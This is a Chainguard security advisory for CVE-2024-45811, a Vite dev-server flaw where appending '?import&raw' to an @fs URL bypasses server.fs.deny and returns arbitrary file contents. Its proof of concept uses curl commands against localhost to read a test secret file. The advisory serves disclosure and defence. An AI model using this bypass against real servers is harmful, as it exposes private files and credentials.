/
DirectorySecurity Advisories
Sign In
Security Advisories

CGA-v669-m39m-96j9

Published

Last updated

https://images.chainguard.dev/security/CGA-v669-m39m-96j9
Package

vitess

RepositoryWolfi
Latest Update
Under investigation
Aliases
  • CVE-2024-45811
  • GHSA-9cwx-2883-4wfx

Severity

Unknown

Summary

Vite's server.fs.deny is bypassed when using ?import&raw

Description

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

References

Updates


Safe Source for Open Sourceâ„¢
Media KitContact Us
© 2025 Chainguard. All Rights Reserved.
Private PolicyTerms of Use

Products

Chainguard ContainersChainguard LibrariesChainguard VMs